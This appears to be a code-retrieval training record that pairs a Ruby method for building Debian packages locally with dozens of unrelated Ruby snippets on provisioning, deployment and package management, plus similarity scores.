"def update_setEnv_scripts\n Puppet.alert(\" begin : update_setEnv_scripts \")\n file_name = get_value4key(\"ps_config_home\", resource[:web_location_attrib]) + \"/webserv/\"\n file_name += get_value4key(\"webdomainname\", resource[:webdomain_attrib]) + \"/bin/setEnv.sh\"\n\n Puppet.debug(\" update_setEnv_scripts : #{file_name} \")\n\n text = File.read(file_name)\n Puppet.debug(\" update_setEnv_scripts 1 : #{file_name} \")\n httpsport = get_value4key(\"webadminserverhttps\", resource[:webadmin_server_attrib] )\n\n Puppet.debug(\" update_setEnv_scripts 1A : #{httpsport} \")\n ##new_contents = text.gsub(/443/, get_value4key(\"webadminserverhttps\", resource[:webadmin_server_attrib] ) )\n\n Puppet.debug(\" update_setEnv_scripts 2 : #{file_name} \")\n new_contents1 = text.gsub(/9999/, get_value4key(\"webadminserverhttp\", resource[:webadmin_server_attrib] ) )\n\n Puppet.debug(\" update_setEnv_scripts 3 : #{file_name} \")\n jvm_small_size1= \"-Xms2048m\"\n jvm_max_size2= \"-Xmx2048m\"\n jvm_small_size2= \"-Xms1024m\"\n jvm_max_size2= \"-Xmx1024m\"\n\n ####new_contents = new_contents1.gsub(/-Xms256m/, jvm_max_size )\n ####new_contents1 = new_contents.gsub(/-Xmx256m/, jvm_max_size )\n\n\n new_contents = new_contents1.gsub(\"-server -Xms512m -Xmx512m\", \"-server -Xms2048m -Xmx2048m\" )\n new_contents1 = new_contents.gsub(\"-server -Xms256m -Xmx256m\", \"-server -Xms1024m -Xmx1024m\" )\n\n Puppet.debug(\" update_setEnv_scripts updating ADMINSERVER_HOSTNAME : #{file_name} \")\n oldstr=\"ADMINSERVER_HOSTNAME=\" + get_value4key(\"appserverhost\", resource[:webdomain_attrib])\n newstr=\"ADMINSERVER_HOSTNAME=\" + get_value4key(\"webadminserverhost\", resource[:webadmin_server_attrib] )\n\n new_contents2 = new_contents1.gsub(oldstr, newstr )\n\n\n new_contents = new_contents2.gsub(/-XX:MaxPermSize=128m/, \"-XX:MaxPermSize=256m\" )\n File.open(file_name, \"w\") {|file| file.puts new_contents }\n Puppet.alert(\" end : update_setEnv_scripts \")\n end",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
"def set_initial_path\n `echo $PATH`.split(':').each do |path|\n add_env_path path\n end\nend",
"def restore_spec_configuration\n ActiveFedora.init(:fedora_config_path=>File.join(File.dirname(__FILE__), \"..\", \"config\", \"fedora.yml\"))\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod \"puppet-#{name}\", :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def backup_config_file\n File.join(source_directory,'installer','rails_installer_defaults.yml')\n end",
"def pre_update_extension volume_root, options\n if !File.exist? (mach_kernel = File.join(volume_root, \"mach_kernel\")) and (options[:mach_kernel] or !options[:extensions][:up_to_date])\n IESD::Packages::BaseSystemBinaries.new(File.join(volume_root, PACKAGES, \"BaseSystemBinaries.pkg\")).extract_mach_kernel mach_kernel\n system(\"/usr/bin/env\", \"chflags\", \"hidden\", mach_kernel)\n end\n end",
"def debian_version\n IO.read('/etc/debian_version').strip.split('.')\n end",
"def system_update(&block)\n ssh.exec! \"apt-get --assume-yes update\", sudo: true\n ssh.exec \"apt-get --assume-yes upgrade\", sudo: true do |ch, stream, data, cmd|\n yield data\n end\n end",
"def copy_stage_config\n run \"if [ -f #{release_path}/config/stage_configs/#{stage}.rb ]; then cp #{release_path}/config/stage_configs/#{stage}.rb #{release_path}/config/environments/stage.rb; fi\"\n end",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def dev(name, *args)\n mod name, :path => \"#{ENV['HOME']}/src/boxen/puppet-#{name}\"\nend",
"def docker_postinstall_sf2(containername, framework, port)\n # change base domain\n system \"perl -pi -e 's/base_hostname:.*$/base_hostname: \\'#{@@docker_ip}:#{port}\\'/' app/config/parameters.yml\"\n system \"perl -pi -e 's/base_domain:.*$/base_domain: \\'#{@@docker_ip}:#{port}\\'/' app/config/parameters.yml\"\n\n docroot = Dir.pwd\n\n # get last container version\n system \"docker pull nextdeploy/#{framework}console\"\n\n # Ensure that the first composer has finish before launch symfony commands\n until File.exists?(\"app/bootstrap.php.cache\") || File.exists?(\"var/bootstrap.php.cache\") do\n puts \"Waiting composer finished his work .....\"\n sleep 5\n end\n\n puts \"Install symfony website\"\n # install and configure doctrine database\n system \"docker run --net=#{@projectname}_default -v=#{docroot}:/var/www/html nextdeploy/#{framework}console assets:install --symlink\"\n end",
"def update!(**args)\n @apt = args[:apt] if args.key?(:apt)\n @deb = args[:deb] if args.key?(:deb)\n @desired_state = args[:desired_state] if args.key?(:desired_state)\n @googet = args[:googet] if args.key?(:googet)\n @msi = args[:msi] if args.key?(:msi)\n @rpm = args[:rpm] if args.key?(:rpm)\n @yum = args[:yum] if args.key?(:yum)\n @zypper = args[:zypper] if args.key?(:zypper)\n end",
"def update(&block)\n ssh.exec! \"apt-get --assume-yes update\", sudo: true\n ssh.exec \"apt-get --assume-yes upgrade\", sudo: true do |ch, stream, data, cmd|\n yield data\n end\n end",
"def update\n # Install in pacman can be used for update, too\n self.install\n end",
"def update\n # Install in pacman can be used for update, too\n self.install\n end",
"def install\n copy_envrc\n copy_database_yml\n copy_docker_db_setup_sh\n system(`direnv allow`)\n print(\"#{readme}\\n\")\n end",
"def braid_update_config\n bundle_exec('braid setup 2>&1 > /dev/null', false)\n bundle_exec('braid upgrade-config') if 0 == $?.exitstatus\n end",
"def get_install_client\n purge\n s('cd /tmp')\n s('wget https://apt.puppetlabs.com/puppetlabs-release-trusty.deb')\n s('sudo apt-get update')\n s('sudo apt-get -y install puppet')\nend",
"def run_stage_one \n\t# directory tools is needed by stage on, be sure it does not exist yet\n\tif File.exists?(\"/tools\")\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > EXIT! Directory or softlink /tools already exists\"\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > Too risky for me to continue. Remove /tools, then\"\n\t\tputs sprintf(\"%015.4f\", Time.now.to_f) + \" error > try again.\"\n\t\t$stdout.flush\n\t\traise \"SoftlinkAlreadyThere\"\n\tend\n\t# File.symlink(@builddir + \"/stage01/chroot/tools\", \"/tools\")\n\tsystem(\"mkdir /tools\")\n\tsystem(\"mkdir -p \" + @builddir + \"/stage01/chroot/tools\")\n\tsystem(\"mount -o bind \" + @builddir + \"/stage01/chroot/tools /tools\")\n\t[ \"/stage01\", \"/stage01/build\",\"/stage01/chroot\",\"/stage01/chroot/tools\", \"/tmp\" ].each { |d|\n\t\tunless File.exists?(@builddir + d)\n\t\t\tDir.mkdir(@builddir + d)\n\t\tend\n\t}\n\t# Stage 01 abfrühstücken\n\t# Alle Scripte in stage01 suchen\n\tstage_one_objs = get_stage_one_objs\n\t# Download first\n\tstage_one_objs.each { |i| i.download }\n\t# Unpack\n\tstage_one_objs.each { |i|\n\t\ti.unpack\n\t\t### Dir.chdir(@workdir)\n\t\ti.patch(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.build(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.install(@log_each)\n\t\t### Dir.chdir(@workdir)\n\t\ti.filecheck\n\t\t### Dir.chdir(@workdir)\n\t}\n\tsystem(\"umount /tools\")\nend",
"def setup_data_dir\n changes = []\n\n case distro\n\n when RHEL\n unless pg_data_dir == pg_default_data_dir\n changes = rput( 'etc/sysconfig/pgsql/postgresql', user: :root )\n end\n\n sudo_if( \"[ ! -d '#{pg_data_dir}/base' ]\" ) do\n sudo <<-SH\n mkdir -p #{pg_data_dir}\n chown postgres:postgres #{pg_data_dir}\n chmod 700 #{pg_data_dir}\n SH\n pg_initdb\n end\n\n when Debian\n unless pg_data_dir == pg_default_data_dir\n sudo <<-SH\n if [ ! -d '#{pg_data_dir}/base' ]; then\n mkdir -p #{pg_data_dir}\n chown postgres:postgres #{pg_data_dir}\n chmod 700 #{pg_data_dir}\n mv #{pg_default_data_dir}/* #{pg_data_dir}/\n fi\n SH\n end\n else\n raise ContextError, \"Distro #{distro.class.name} not supported\"\n end\n\n changes\n end",
"def standard_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n tmp_file = \"/tmp/zone_\"+options['name']\n admin_username = options['q_struct']['admin_username'].value\n admin_uid = options['q_struct']['admin_uid'].value\n admin_gid = options['q_struct']['admin_gid'].value\n admin_crypt = options['q_struct']['admin_crypt'].value\n root_crypt = options['q_struct']['root_crypt'].value\n admin_fullname = options['q_struct']['admin_description'].value\n admin_home = options['q_struct']['admin_home'].value\n admin_shell = options['q_struct']['admin_shell'].value\n passwd_file = options['clientdir']+\"/etc/passwd\"\n shadow_file = options['clientdir']+\"/etc/shadow\"\n message = \"Checking:\\tUser \"+admin_username+\" doesn't exist\"\n command = \"cat #{passwd_file} | grep -v '#{admin_username}' > #{tmp_file}\"\n execute_command(options,message,command)\n message = \"Adding:\\tUser \"+admin_username+\" to \"+passwd_file\n admin_info = admin_username+\":x:\"+admin_uid+\":\"+admin_gid+\":\"+admin_fullname+\":\"+admin_home+\":\"+admin_shell\n command = \"echo '#{admin_info}' >> #{tmp_file} ; cat #{tmp_file} > #{passwd_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",passwd_file)\n info = IO.readlines(shadow_file)\n file = File.open(tmp_file,\"w\")\n info.each do |line|\n field = line.split(\":\")\n if field[0] != \"root\" and field[0] != \"#{admin_username}\"\n file.write(line)\n end\n if field[0].to_s.match(/root/)\n field[1] = root_crypt\n copy = field.join(\":\")\n file.write(copy)\n end\n end\n output = admin_username+\":\"+admin_crypt+\":::99999:7:::\\n\"\n file.write(output)\n file.close\n message = \"Information:\\tCreating shadow file\"\n command = \"cat #{tmp_file} > #{shadow_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",shadow_file)\n client_home = options['clientdir']+admin_home\n message = \"Information:\\tCreating SSH directory for \"+admin_username\n command = \"mkdir -p #{client_home}/.ssh ; cd #{options['clientdir']}/export/home ; chown -R #{admin_uid}:#{admin_gid} #{admin_username}\"\n execute_command(options,message,command)\n # Copy admin user keys\n rsa_file = admin_home+\"/.ssh/id_rsa.pub\"\n dsa_file = admin_home+\"/.ssh/id_dsa.pub\"\n key_file = client_home+\"/.ssh/authorized_keys\"\n if File.exist?(key_file)\n system(\"rm #{key_file}\")\n end\n [rsa_file,dsa_file].each do |pub_file|\n if File.exist?(pub_file)\n message = \"Information:\\tCopying SSH public key \"+pub_file+\" to \"+key_file\n command = \"cat #{pub_file} >> #{key_file}\"\n execute_command(options,message,command)\n end\n end\n message = \"Information:\\tCreating SSH directory for root\"\n command = \"mkdir -p #{options['clientdir']}/root/.ssh ; cd #{options['clientdir']} ; chown -R 0:0 root\"\n execute_command(options,message,command)\n # Copy root keys\n rsa_file = \"/root/.ssh/id_rsa.pub\"\n dsa_file = \"/root/.ssh/id_dsa.pub\"\n key_file = options['clientdir']+\"/root/.ssh/authorized_keys\"\n if File.exist?(key_file)\n system(\"rm #{key_file}\")\n end\n [rsa_file,dsa_file].each do |pub_file|\n if File.exist?(pub_file)\n message = \"Information:\\tCopying SSH public key \"+pub_file+\" to \"+key_file\n command = \"cat #{pub_file} >> #{key_file}\"\n execute_command(options,message,command)\n end\n end\n # Fix permissions\n message = \"Information:\\tFixing 
SSH permissions for \"+admin_username\n command = \"cd #{options['clientdir']}/export/home ; chown -R #{admin_uid}:#{admin_gid} #{admin_username}\"\n execute_command(options,message,command)\n message = \"Information:\\tFixing SSH permissions for root \"\n command = \"cd #{options['clientdir']} ; chown -R 0:0 root\"\n execute_command(options,message,command)\n # Add sudoers entry\n sudoers_file = options['clientdir']+\"/etc/sudoers\"\n message = \"Information:\\tCreating sudoers file \"+sudoers_file\n command = \"cat #{sudoers_file} |grep -v '^#includedir' > #{tmp_file} ; cat #{tmp_file} > #{sudoers_file}\"\n execute_command(options,message,command)\n message = \"Information:\\tAdding sudoers include to \"+sudoers_file\n command = \"echo '#includedir /etc/sudoers.d' >> #{sudoers_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n sudoers_dir = options['clientdir']+\"/etc/sudoers.d\"\n check_dir_exists(options,sudoers_dir)\n sudoers_file = sudoers_dir+\"/\"+admin_username\n message = \"Information:\\tCreating sudoers file \"+sudoers_file\n command = \"echo '#{admin_username} ALL=(ALL) NOPASSWD:ALL' > #{sudoers_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def update_deprecated_config\n # return # Until further notice\n return if File.exist?(default_config_file)\n\n old_file = File.join(Util.user_home, '.doingrc')\n return unless File.exist?(old_file)\n\n Doing.logger.log_now(:warn, 'Deprecated:', \"main config file location has changed to #{config_file}\")\n res = Prompt.yn(\"Move #{old_file} to new location, preserving settings?\", default_response: true)\n\n return unless res\n\n if File.exist?(default_config_file)\n res = Prompt.yn(\"#{default_config_file} already exists, overwrite it?\", default_response: false)\n\n unless res\n @config_file = old_file\n return\n end\n end\n\n FileUtils.mv old_file, default_config_file, force: true\n Doing.logger.log_now(:warn, 'Config:', \"Config file moved to #{default_config_file}\")\n Doing.logger.log_now(:warn, 'Config:', %(If ~/.doingrc exists in the future,\n it will be considered a local config and its values will override the\n default configuration.))\n Process.exit 0\n end",
"def update_cookbooks()\n self.resolver.config_dir = self.options[:config_dir] ? self.options[:config_dir] : Dir.pwd\n unless File.exists?(\"cookbooks\")\n\tKitchenplan::Log.info \"No cookbooks directory found. Running #{self.resolver.name} to download necessary cookbooks.\"\n\tself.platform.normaldo self.resolver.fetch_dependencies()\n end\n if self.options[:update_cookbooks]\n\tKitchenplan::Log.info \"Updating cookbooks with #{self.resolver.name}\"\n\tself.platform.normaldo self.resolver.update_dependencies()\n end\n end",
"def save_configuration_files(server)\n puts \"Saving config files\"\n probe(server, 'mkdir -p /root/start_stop_backup')\n probe(server, 'cp /etc/postfix/main.cf /root/start_stop_backup/.')\n probe(server, 'cp /etc/syslog-ng/syslog-ng.conf /root/start_stop_backup/.')\n end",
"def patch_containers(containers)\n (containers || Array.new).each do |container|\n if container[\"image\"] =~ /.*velum.*/\n container[\"image\"] = \"sles12/velum:development\"\n container[\"volumeMounts\"] ||= Array.new\n container[\"volumeMounts\"] << {\n \"mountPath\" => \"/srv/velum\",\n \"name\" => \"velum-devel\"\n }\n container[\"env\"] ||= Array.new\n container[\"env\"].each do |env|\n env[\"value\"] = \"development\" if env[\"name\"] == \"RAILS_ENV\"\n end\n\n # Ensure the velum_production db is used, this is what the\n # salt mysql returner is configured to use\n container[\"env\"] << {\n \"name\" => \"VELUM_DB_NAME\",\n \"value\" => \"velum_production\"\n }\n end\n end\nend",
"def local_cache(basebox_name)\n cache_dir = Vagrant::Environment.new.home_path.join('cache', 'apt', basebox_name)\n # Vagrant::Environment.new.home_path\n print cache_dir\n cache_dir.mkpath unless cache_dir.exist?\n partial_dir = cache_dir.join('partial')\n partial_dir.mkdir unless partial_dir.exist?\n cache_dir\nend",
"def _save_env\n require 'yaml'\n w_var = @var.dup\n @var[:blacklist_env].each { |b| w_var.delete b } if @var[:blacklist_env]\n _open_sefile('env3.yml', 'w') { |f| YAML.dump(w_var, f) }\nend",
"def rest_of_lxc_config_file\n if File.exists?( File.join( options[:root], 'etc/init/container-detect.conf') )\n ttydir = \"lxc\"\n else\n ttydir = \"\"\n end\n\n render( \"templates/lxc_config_footer.erb\", {:ttydir => ttydir} )\n end",
"def copy_configuration_files\n replace_file 'config/routes.rb'\n replace_file 'config/environments/development.rb'\n replace_file 'config/environments/test.rb'\n copy_file 'templates/.env', '.env'\n copy_file 'templates/.tool-versions', '.tool-versions'\n replace_file 'config/initializers/dotenv.rb'\n replace_file 'config/initializers/colorize.rb'\n git add: '.'\n git commit: %Q{ -m \"Update application configuration\" }\nend",
"def stage_apt_archives(directory)\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -type d -name #{directory}\"\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -maxdepth 2 -type f\" if directory == 'main'\n command = <<-CMD\n for stuff in $(#{find_command}); do\n find $stuff -type l -delete\n codename=$(dirname ${stuff##{Pkg::Config.apt_repo_staging_path}/})\n sudo mkdir --parents #{Pkg::Config.freight_archive_path}/$codename\n sudo chown root:release -R #{Pkg::Config.freight_archive_path}/$codename\n sudo chmod g+w -R #{Pkg::Config.freight_archive_path}/$codename\n mv $stuff #{Pkg::Config.freight_archive_path}/$codename\n\n pool_directory=#{Pkg::Config.apt_repo_path}/pool/$codename/#{directory}\n if [ ! -d $pool_directory ]; then\n echo \"Can't find directory $pool_directory, it may have already been archived, skipping . . .\"\n continue\n fi\n sudo mkdir --parents /opt/tmp-apt\n sudo chown root:release -R /opt/tmp-apt\n sudo chmod g+w -R /opt/tmp-apt\n mv $pool_directory /opt/tmp-apt\n done\n CMD\n Pkg::Util::Net.remote_execute(Pkg::Config.staging_server, command)\n end",
"def update\n Puppet.debug(\"Debconf: updating #{resource[:name]}\")\n\n # Build the string to send\n args = [:package, :item, :type, :value].map { |e| resource[e] }.join(' ')\n\n IO.popen('/usr/bin/debconf-set-selections', 'w+') do |pipe|\n Puppet.debug(\"Debconf: debconf-set-selections #{args}\")\n pipe.puts(args)\n\n # Ignore remaining output from command\n pipe.close_write\n pipe.read(nil)\n end\n end",
"def prepare_master_kubeconfig(config)\n\n config.vm.provision \"shell\", inline: <<-SHELL\n mkdir -p /home/vagrant/.kube\n cp -i /etc/kubernetes/admin.conf /home/vagrant/.kube/config\n chown vagrant:vagrant /home/vagrant/.kube/config\n mkdir -p $HOME/.kube\n cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\n chown $(id -u):$(id -g) $HOME/.kube/config\n SHELL\n\nend",
"def app_services_create\n # SEE http://off-the-stack.moorman.nu/posts/5-user-services-with-runit/ for info on scripts\n c = Capistrano::BaseHelper.get_capistrano_instance\n c.run(\"#{c.sudo} mkdir -p '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path)}'\")\n \n commands = []\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root /etc/sv/#{c.fetch(:user)}\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root /etc/sv/#{Capistrano::BaseHelper.user_app_env_path}\"\n c.run(commands.join(\" && \"))\n Capistrano::BaseHelper.generate_and_upload_config( Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_local_run), Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_remote_run), true )\n Capistrano::BaseHelper.generate_and_upload_config( Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_local_finish), Capistrano::BaseHelper::get_capistrano_instance.fetch(:runit_remote_finish), true )\n\n commands = []\n commands << \"#{c.sudo} chmod u+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chmod u+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n commands << \"#{c.sudo} chmod g+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chmod g+x '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"run\")}'\"\n commands << \"#{c.sudo} chown #{c.fetch(:user)}:root '#{File.join(\"/etc\", \"sv\", Capistrano::BaseHelper.user_app_env_path, \"finish\")}'\"\n c.run(commands.join(\" && \"))\n\n Capistrano::RunitBase.app_services_create_log_service\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end"
] | [
"0.721814",
"0.6581492",
"0.6412914",
"0.62594265",
"0.6220686",
"0.61962616",
"0.60835385",
"0.59578365",
"0.5928997",
"0.58600885",
"0.58563536",
"0.57297826",
"0.56680995",
"0.56155807",
"0.5538033",
"0.55320096",
"0.550211",
"0.5484689",
"0.54720473",
"0.545635",
"0.5452248",
"0.5450611",
"0.54412764",
"0.54304713",
"0.5425798",
"0.54224753",
"0.5405589",
"0.53742",
"0.53740793",
"0.53460515",
"0.5345218",
"0.53450924",
"0.5341083",
"0.53400487",
"0.5323035",
"0.5308158",
"0.53016406",
"0.5291422",
"0.52821696",
"0.5278927",
"0.526813",
"0.52628005",
"0.52596235",
"0.522185",
"0.5218981",
"0.521397",
"0.5206227",
"0.52025753",
"0.51987225",
"0.51979846",
"0.5196951",
"0.5196105",
"0.51900846",
"0.51753676",
"0.5167874",
"0.5166138",
"0.51590186",
"0.5150623",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.51491517",
"0.5141535",
"0.5140395",
"0.5115812",
"0.51135224",
"0.51132184",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5105874",
"0.5103755",
"0.5103448",
"0.50971204",
"0.50929415",
"0.50929415",
"0.5087071",
"0.5082359",
"0.50817937",
"0.5071656",
"0.5071072",
"0.50570107",
"0.5055169",
"0.50364393",
"0.5035288",
"0.5033211",
"0.5025072",
"0.5024756",
"0.5019291",
"0.50155944",
"0.5013834",
"0.5011602",
"0.50098526",
"0.5005557",
"0.499986"
] | 0.7720927 | 0 |
Build package locally; return path to locally built file | def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)
options, unknown_options = Kernel.filter_options options,
:distributions => nil,
:parallel_build_level => nil
filepath = build_dir
# cd package_name
# tar -xf package_name_0.0.debian.tar.gz
# tar -xf package_name_0.0.orig.tar.gz
# mv debian/ package_name_0.0/
# cd package_name_0.0/
# debuild -us -uc
# #to install
# cd ..
# sudo dpkg -i package_name_0.0.deb
Packager.info "Building #{pkg_name} locally with arguments: pkg_name #{pkg_name}," \
" debian_pkg_name #{debian_pkg_name}," \
" versioned_build_dir #{versioned_build_dir}" \
" deb_filename #{deb_filename}" \
" options #{options}"
begin
FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub("/","-")) do
if File.exist? "debian"
FileUtils.rm_rf "debian"
end
if File.exist? versioned_build_dir
FileUtils.rm_rf versioned_build_dir
end
FileUtils.mkdir versioned_build_dir
debian_tar_gz = Dir.glob("*.debian.tar.gz")
debian_tar_gz.concat Dir.glob("*.debian.tar.xz")
if debian_tar_gz.empty?
raise RuntimeError, "#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}"
else
debian_tar_gz = debian_tar_gz.first
cmd = ["tar", "-xf", debian_tar_gz]
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd.join(" ")}' failed"
end
end
orig_tar_gz = Dir.glob("*.orig.tar.gz")
if orig_tar_gz.empty?
raise RuntimeError, "#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}"
else
orig_tar_gz = orig_tar_gz.first
cmd = ["tar"]
cmd << "-x" << "--strip-components=1" <<
"-C" << versioned_build_dir <<
"-f" << orig_tar_gz
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd.join(" ")}' failed"
end
end
FileUtils.mv 'debian', versioned_build_dir + '/'
FileUtils.chdir versioned_build_dir do
cmd = ["debuild", "-us", "-uc"]
if options[:parallel_build_level]
cmd << "-j#{options[:parallel_build_level]}"
end
if !system(*cmd, :close_others => true)
raise RuntimeError, "Packager: '#{cmd}' failed"
end
end
filepath = Dir.glob("*.deb")
if filepath.size < 1
raise RuntimeError, "No debian file generated in #{Dir.pwd}"
elsif filepath.size > 1
raise RuntimeError, "More than one debian file available in #{Dir.pwd}: #{filepath}"
else
filepath = filepath.first
end
end
rescue Exception => e
msg = "Package #{pkg_name} has not been packaged -- #{e}"
Packager.error msg
raise RuntimeError, msg
end
filepath
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def build_path\n @build_path ||= Pathname.new(source_dir).join(data['build_path'] || './build').to_s\n end",
"def build_root()\n \"#{project_root}/build\"\n end",
"def output_path\n \"build\"\n end",
"def build_path\n @build_path ||= \"#{@ant_path}/#{@config[:build_name]}\"\n end",
"def build_path\n Pathname.new(config[:build_path])\n end",
"def build_root\n Pathname.new(ENV[\"OBJDIR\"] || \"build\")\n end",
"def build_path\n Pathname.new(self.config[:build_path]) \n end",
"def build\n\t@built_gem_path ||= @helper.build_gem\nend",
"def build_script\n File.join(data_dir, 'build-script')\n end",
"def build_directory\n File.expand_path(config['build_directory'])\n end",
"def __path__\n File.join(root, 'tmp', 'build')\n end",
"def build_dir\n Rscons.application.build_dir\n end",
"def build_dir\n File.expand_path(\"#{Config.build_dir}/#{project.name}\")\n end",
"def build_target_path\n File.join(destination, configuration[:build_target_path])\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def to_build_rel pn\n pn.relative_path_from(build_dir)\n end",
"def build_dir\n @build_dir ||= File.join(Crate.project.build_dir, name )\n end",
"def get_project_path\n return File.absolute_path File.join(root_dir, src)\n end",
"def component_build_path(cmp)\n File.join WORK_PATH, 'build', cmp\nend",
"def component_build_path(cmp)\n File.join WORK_PATH, 'build', cmp\nend",
"def pathDist\n\t\"../../\" + distPackageName + \"_\" + version + \"/\"\nend",
"def pack_path(name)\n path = WebpackerLite::Configuration.base_path\n file = WebpackerLite::Manifest.lookup(name)\n \"#{path}/#{file}\"\n end",
"def source_root\n FilePath.new(build_module.root, name).canonicalize\n end",
"def local_source\n @local_source ||= File.join( build_dir, File.basename( upstream_source.path ) )\n end",
"def build\n cd_and_sh( pkg_dir, build_commands )\n end",
"def stow_buildout_path\n \"#{node['stow']['path']}/stow#{pkg_delim}#{node['stow']['version']}\"\n end",
"def package_scripts_path\n \"#{Config.project_root}/package-scripts/#{name}\"\n end",
"def build_to_temp_dir\n @builder.build_project\n\n # Copy build files to temporary directory\n @task.shell.mute do\n @task.directory @project.build_path, ::File.join(@project.package_path, @package_name), :force => true\n end\n end",
"def local_path\n check_and_copy_local_file_to_rails_public\n File.join('ajaxlibs', library_name, version, file_name)\n end",
"def manifest_path\n build_output_dir.join('manifest.json')\n end",
"def pathDistSource\n\tpathDist + \"source/\"\nend",
"def bundled_path\n File.dirname Wisp::Source.bundled_path\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def local_path\n src = if %i(direct repo).include?(new_resource.source)\n package_metadata[:url]\n else\n new_resource.source.to_s\n end\n ::File.join(Chef::Config[:file_cache_path], ::File.basename(src))\n end",
"def tar_path\n File.expand_path(@env[\"package.output\"], FileUtils.pwd)\n end",
"def src_path\n ENV[\"GOPATH\"]\nend",
"def target_path(target_name)\r\n File.join(package_dir, target_name)\r\n end",
"def build_dir\n Puppet::Forge::Cache.base_path + \"tmp-unpacker-#{Digest::SHA1.hexdigest(@filename.basename.to_s)}\"\n end",
"def localPath(taskName)\n self.pipeline.pipe_root + \"/build/prod/\" + taskName\n end",
"def compiled_path; end",
"def bits_full_local_path\n File.join(version_dir, BITS_FILENAME)\n end",
"def local_path\n File.join([\"Subassemblies\", \"#{self.name}.craft\"])\n end",
